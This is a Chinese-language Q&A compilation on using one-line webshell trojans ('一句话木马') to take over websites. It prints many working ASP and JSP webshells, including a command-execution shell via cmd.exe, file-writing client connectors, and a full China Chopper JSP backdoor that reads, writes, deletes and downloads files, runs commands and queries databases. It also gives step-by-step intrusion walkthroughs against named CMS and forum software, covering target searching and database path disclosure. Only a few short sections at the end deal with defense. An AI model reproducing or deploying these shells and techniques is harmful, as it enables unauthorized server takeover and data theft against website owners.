改写一句话木马连接云服务器

‘壹’ 一句话木马的使用方法

首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库，或者加进asp网页.
记住!我们的目的是把一句话<%execute request(value)%>添加到数据库,无论任何方式!
然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后进入此网站服务器。

‘贰’ 一句话木马怎样用

一句话插入某页面。然后用一句话服务端连接。上传大马小马。得到webshell。

‘叁’ 超高分求 asp一句话木马~

ASP一句话木马大全！

<%eval request("MH")%>

<%execute request("MH")%>

<%execute(request("MH"))%>

<%If Request("MH")<>"" Then Execute(Request("MH"))%>

<%if request ("MH")<>""then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>

<SCRIPT language=VBScript runat="server">execute request("MH")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["MH"],"unsafe");%>

1 asp一句话木马
一句话木马 服务器端
带验证:
——————————————cmd.asp————————————————
<%
if request("authkey")="pic16f873a" then
%>
<textarea readonly cols=80 rows=25>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
</textarea>
<%
end if
%>

带验证 客户端
——————————————cmd.html————————————————
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frm target=_blank>
Host:<input type=text name=act size=65 value="http://">
<br>
<br>
Cmd :<input type=text name=cmd size=65 value="cmd">
<br>
<br>
<input type=hidden name=authkey value="pic16f873a">
<Input name=Send
onclick="javascipt:frm.action=document.frm.act.value;
frm.submit();"
type=button value="Send Command">
</FORM>
</div>

目录浏览

服务器端
_________________________________________
<%
if request("authkey")="pic16f873a" then
szPara = Request.Form("path")
set shell=server.createobject("shell.application")
set dir1=shell.namespace(szPara)
set diritems=dir1.items

for each iii in diritems
response.write iii.path & "<font color=blue>[" & iii.size &"]</font><br>"
next
end if
%>
_________________________________________
客户端
__________________________________________
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frm target=_blank>
Host:<input type=text name=act size=65 value="http://">
<br>
<br>
Path:<input type=text name=path size=65 value="C:\">
<br>
<br>
<input type=hidden name=authkey value="pic16f873a">
<Input name=Send onclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"
type=button value="Send Command">

</FORM>
</div>

一句话木马客户端源文件：

里面涉及到一些脚本知识，我就只讲解一下功能和简单注释，不详细讲了，大家只要注意几个注意点就行了
***********************************************************

<form action=http://cjy.xjife.e.cn/news/ebook/db/ebook.asp method=post>
//"action="后面是需要修改的以asp命名的数据库的提交地址
//这个标签的意思是建立一个表单 以post方式提交给连接http://cjy.xjife.e.cn/news/ebook/db/ebook.asp处理

<textarea name=value cols=120 rows=10 width=45>
//这里的value值根据服务端<%execute request("value")%>中value而设定
//可以自行修改成<%execute request("p")%>相应这里的value值也必须改为p

set lP=server.createObject("Adodb.Stream")//建立流对象，有了对象才可以使用它固有的属性和方法
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("joeving") //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应
lP.SaveToFile server.mappath("wei.asp"),2
//将木马内容以覆盖文件的方式写入wei.asp
//2就是已覆盖的方式，这里的wei.asp也是可以自己定义的，如定义成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "wei.asp" //转向生成的wei.asp 和上面的wei.asp相对应，也就是你熟悉的asp木马登 陆界面
</textarea>
//这段程序的功能：利用插入到数据库文件的<%execute request("value")%>这段代码执行第一个textarea中的内容，并将添加的木马内容写入和指向wei.asp，这样就相当于在服务器上建立了个asp木马文件，这样就可以取得webshell了

<textarea name=joeving cols=120 rows=10 width=45>添入生成木马的内容/textarea><BR><center><br>
//这段标签是你用来添加木马内容用的

<input type=submit value=提交>
</form>

***********************************************************

//程序的主要框架是
<form>
<textarea></textarea>//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示
<textarea></textarea>//添加木马内容用的
</form>
其实都是些很简单的一些html和asp的知识，大家不妨自己写个自己的木马客户端~~~呵呵

‘肆’ 一句话木马怎么插和我插了一句话木马之后那个打开网址然后上传代码的网址是多少那些教程里没有说那个地址

一句话木马插入方法：第一种：先判断数据库是asp或其他格式，若为asp格式，可通过留言本向数据库插入一句话代码，插入后，用中国菜刀连接留言本数据库地址（数据库地址可以通过暴库爆出路径，暴不出路径，就用工具强行扫描，看是否能扫到数据库地址）就得到webshell了。第二种：进入网站后台，然后修改网站名，把网站名修改成一句话木马代码，记住，要闭合插入一句话，即

"%><%evalrequest("这里换成你喜欢设的密码"%><%s="'闭合的一句话木马代码
<%evalrequest("这里换成你喜欢设的密码"%>'未闭合的一句话木马代码

有一次，我进了一个网站后台，修改网站名时，没有闭合插入一句话木马代码，致使后台出现了403错误，无法打开，白浪费了一个网站。闭合插入并保存后，用中国菜刀连接网站配置文件（配置文件路径可以通过插入未闭合的一句话木马代码，不保存，点击后台别的位置，会出现错误提示，下面的路径就是网站配置文件的路径），因为网站名等信息在网站的配置文件中，就要连接配置文件，成功后，你就得到了网站webshell了。

总之，我是这样拿站的，希望这些方法对你有用。

‘伍’ 如何使用JSP一句话木马和菜刀木马

相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生，小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭，不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要，我也对几个站点做了Struts2重定向漏洞的测试，所有使用Struts2框架的网站安全问题均不容乐观，中标率几乎达到了85%以上。也许一场血雨腥风的Struts2漏洞利用潮即将来临。
说了这么多废话，本文的目的是什么呢？其实只是想记录一下JSP几种后门代码啦，因为曾经找JSP菜刀马找的老辛苦了。
1、首先是JSP一句话木马和它的客户端小伙伴。（小伙伴们都惊呆了~~~）
以下是服务端，保存成one.jsp并上传至目标服务器中。
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
通过使用一句话木马客户端连接one.jsp木马。
将下列代码保存为html页面：
<html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名：<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form> <br>服务端代码：<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> </textarea> </div></body>
保存完成后，打开html页面，写入一句话木马服务端地址，例如http://www.cto365.com/one.jsp，写入需要的代码和保存的文件名称点击保存即可。

2、中国菜刀能用的菜刀马
本文除了对jsp一句话木马进行了说明，还提供了一个中国菜刀能用的菜刀马。
将下列代码保存为xx.jsp并上传至目标服务器，使用中国菜刀工具进行连接。
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!String Pwd="cto365.com";String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}Connection GC(String s)throws Exception{String[] x=s.trim().split("rn");Class.forName(x[0].trim()).newInstance();Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/t"+sT+"t"+l[i].length()+"t"+sQ+"n");}else{sF+=l[i].getName()+"t"+sT+"t"+l[i].length()+"t"+sQ+"n";}}sb.append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2){os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+"rn");}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+"t");}r.close();c.close();}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);while(r.next()){sb.append(r.getString("TABLE_NAME")+"t");}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("rn");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")t");}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"t|t");}sb.append("rn");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"t|t");}sb.append("rn");}r.close();}catch(Exception e){sb.append("Resultt|trn");try{m.executeUpdate(q);sb.append("Execute Successfully!t|trn");}catch(Exception ee){sb.append(ee.toString()+"t|trn");}}m.close();c.close();}%><%String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"rn");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());%>

‘陆’ 什么是一句话木马

一句话木马的使用

实例一：“一句话木马”入侵“EASYNEWS新闻管理系统”

“EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版，在该网站系统的留言本组件中就存在着数据过滤不严漏洞，如果网站是默认路径和默认文件名安装的话，入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。

Step1 搜索入侵目标

使用了“EASYNEWS新闻管理系统 v1.01 正式版”的网站，在网站页面的底部版权声明处，往往会有关键字符为“www.****.COM 版权所有”。只要在GOOGLE或网络中以该字符串为关键词进行搜索，就可以找到大量的入侵目标。

Step2 检测入侵条件

在这里，我们以网站“http://www.****.com/news/index.htm”为例进行一次入侵检测。“EASYNEWS新闻管理系统”网站的留言本数据库文件默认是位于“\ebook\db\ebook.asp”，首先在浏览器地址栏中输入“http://www.****.com/news/ebook/db/ebook.asp”，回车后在浏览器页面中将显示访问留言本数据库文件的返回信息。如果在页面中显示乱码，则说明该网站的留言本数据库文件没有改名，可以进行入侵。

Step3 在数据库中插入ASP后门

前面提到了该新闻系统的留言本插件存在过滤不严，因此我们可以通过提交发言，在数据库中插入“一句话木马”服务端代码：

在浏览器中访问“http://www.****.com/news/khly.htm”，打开提交留言页面。在提交页面中的“主页”栏中，直接填写“一句话木马”服务端代码，其它随便填写。确定后点击“发表留言”按钮，文章发表成功后，即可将“一句话木马”服务端代码插入到留言本数据库中了。

Step4 连接后门上传Webshell

由于留言本数据库文件“ebook.asp”是一个ASP文件，所以我们插入到数据库文件中的ASP语句将会被执行。将“一句话木马”客户端中的提交地址改为留言本数据库文件地址，然后用浏览器打开客户端，在上方的输入框中输入上传ASP木马的保存路径，在下面的输入框中可以粘贴入其它的ASP木马代码，这里选择的是桂林老兵网站管理助手ASP代码。点击提交按钮后，刚才粘贴的ASP木马将被写入到论坛服务器中保存。

Step5 打开WEBSHELL

上传的ASP木马被保存到与数据库文件同一WEB目录下，文件名为“temp.asp”，因此我们在IE浏览器中打开页面“http://www.****.com/news/ebook/db/temp.asp”，输入默认的密码“gxgl.com”，就可以看到一个WEBSHELL了。

在Webshell中可以上传其它的文件或者安装木马后门、执行各种命令等，网站的服务器已经掌握在我们的手中，可以为所欲为了。

实例二 “社区超市”入侵动网论坛

Step1 检测入侵条件

以入侵论坛“http://www.****.com/”为例。首先在浏览器地址栏中输入“http://www.****.com/data/shop.asp”，回车后在浏览器页面中将显示访问"shop.asp"文件的返回信息。说明该论坛的社区超市数据库文件没有改名或删除，可以进行入侵。

Step2 在数据库中插入ASP后门

登录论坛后，点击页面中的“娱乐”→“社区超市”，打开社区超市页面。在该页面中选择商店申请，打开“商店申请入驻”页面“http://www.****.com/z_shop_newshop.asp”，在页面中填写任意信息，注意在“商店招牌”栏中，添加刚才的ASP代码"〈%execute request("l")%〉"。确定后点击“申请”按钮进行提交，即可将ASP代码保存在数据库文件中了。

后面的步骤就与上面介绍的一样了，只需要用蓝屏木马连接数据库文件“http://sdoygb.w2.****.net/data/shop.asp”，然后上传WEBSHELL就可以控制论坛服务器了。

实例三 “一句话木马”入侵未知网站

从上面的两个例子，我们可以看出利用“一句话木马”入侵控制存在数据库过滤不严漏洞的网站，成功的前提是一定要知道网站的数据库地址。对于一些使用了未知网页程序的网站，我们如何才能找到它的数据库地址呢？这就要结合暴库或者跨站之类的方法了，下面只是结合一个简单的暴库，介绍一下利用一句话木马入侵未知网站的方法。

Step1 暴库得到数据库路径

以“http://bbs.****.com”为例。在浏览器中打开“http://bbs.****.com/join/listall.asp?bid=2”，将地址栏中join后的/改为%5c，在提交后的返回返回信息中可以看到网站数据库地址：“’d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp’”，数据库文件名中加入了“#”符号，“#”符号在IE中执行时被解释为中断符，要访问该数据库文件则必须将“#”号变为“23%”才可以。因此数据库文件的实际WEB地址为“http://bbs.****.com/join/admin/adshuilonG!%23).asp”

Step2 注册网站，插入“一句话木马”

由于数据库文件是ASP文件格式的，满足入侵条件，因此现在我们需要将“一句话木马”插入到数据库文件中去。

在网页上点击注册网站按钮，打开注册链接“http://bbs.****.com/join/add.asp过滤了=step3&bid=3”，在资料填写页面处的站点名称或地址中写入“一句话木马”服务端代码，其它随便填写。然后点击完成按钮提交数据，木马服务端就被插入到数据库文件中了。

最后只需要用蓝屏木马连接数据库文件“http://bbs.****.com/join/admin/adshuilonG!%23).asp”，然后上传ASP木马就可以控制该网站的服务器了。

“一句话木马”的防范

要防范“一句话木马”可以从两方面进行，首先是要隐藏网站的数据库，不要让攻击者知道数据库文件的链接地址。这就需要管理员在网页程序中查被暴库漏洞，在数据库连接文件中加入容错代码等，具体的防暴库方法在这里就不作过多的讲解了。

其次就是要防止用户提交的数据未过滤漏洞，对用户提交的数据进行过滤，替换一些危险的代码等。例如中国站长联盟网站在出现该漏洞后已经对网页程序进行的修补，插入的ASP代码中的〈、〉和"等字符会被网页程序转换成其它字符，致使服务端代码无法正常执行。

只要作好这两方面的安全工作，“一句话木马”虽然无孔不入，但是面对这样的网站系统也是无可奈何的了。

‘柒’ 我想知道一句话木马的简易使用方法~！

蓝屏大叔一句话木马共用两个文件,蓝屏大叔一句话木马服务端和连接端(蓝屏大叔一句话服务端.asp/蓝屏大叔连接端.htm)

简单的介绍一下链接方法,这是链接端的内容:

<form action=http://你的木马网址 method=post> <!--网址改为你的后门地址-->

<textarea name=value cols=120 rows=10 width=45>

set lP=server.createObject("Adodb.Stream")

lP.Open

lP.Type=2

lP.CharSet="gb2312"

lP.writetext request("fhod")

lP.SaveToFile server.mappath("ck.asp"),2

lP.Close

set lP=nothing

response.redirect "ck.asp"

</textarea>

<textarea name=fhod cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br>

<input type=submit value=提交>

这是服务端即上传到肉鸡上的木马内容:

<%execute request("value")%>

就这一句话

给大家看下效果,首先将"蓝屏大叔一句话服务端.asp"上传到肉鸡,如下图.我改了名为"daishu.asp"

然后打开"蓝屏大叔连接端.htm"源文件(打开方法"右键单击"蓝屏大叔连接端.htm"选择用记事本打开"如下图,把"http://你

的木马网址"这上段内容改成你的服务端地址即可

保存退出,打开"蓝屏大叔连接端.htm",在"添入生成木马的内容"文本框中输入你的木马内容即可,比如这里把"站长助手"上

传上去,只要把"站长助手的源文件复制到这里面即可,点上传,看下图效果:

站长助手源代码复制到这里效果

上传的默认文件名为"ck.asp"输入密码就可以进入了

‘捌’ 一句话木马

您好：

建议您不要传播或使用一句话木马，一句话木马会对您的电脑造成损害的，如果您曾使用过此类不安全的一句话木马的话，为了您电脑的安全，建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧，打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以，您可以点击这里下载最新版的腾讯电脑管家：最新版腾讯电脑管家下载

腾讯电脑管家企业平台：http://..com/c/guanjia/

‘玖’ 我的服务器可以iis写入。。。被人写了 一句话木马 好多次了。。555怎么办

1、首先做好服务器基本安全，比如磁盘权限、数据库等
2、做好网站目录安全，网站独立权限，相互不干扰；
3、用护卫神安全套装，针对网站定制规则，不修改网站代码，彻底防止挂马和篡改。

‘拾’ 一句话木马图片合二为一后，上传到服务器了，客户端连不上！！结尾是

上传后改下后缀，学习拿站拿服务器首选，乌龙寺技术站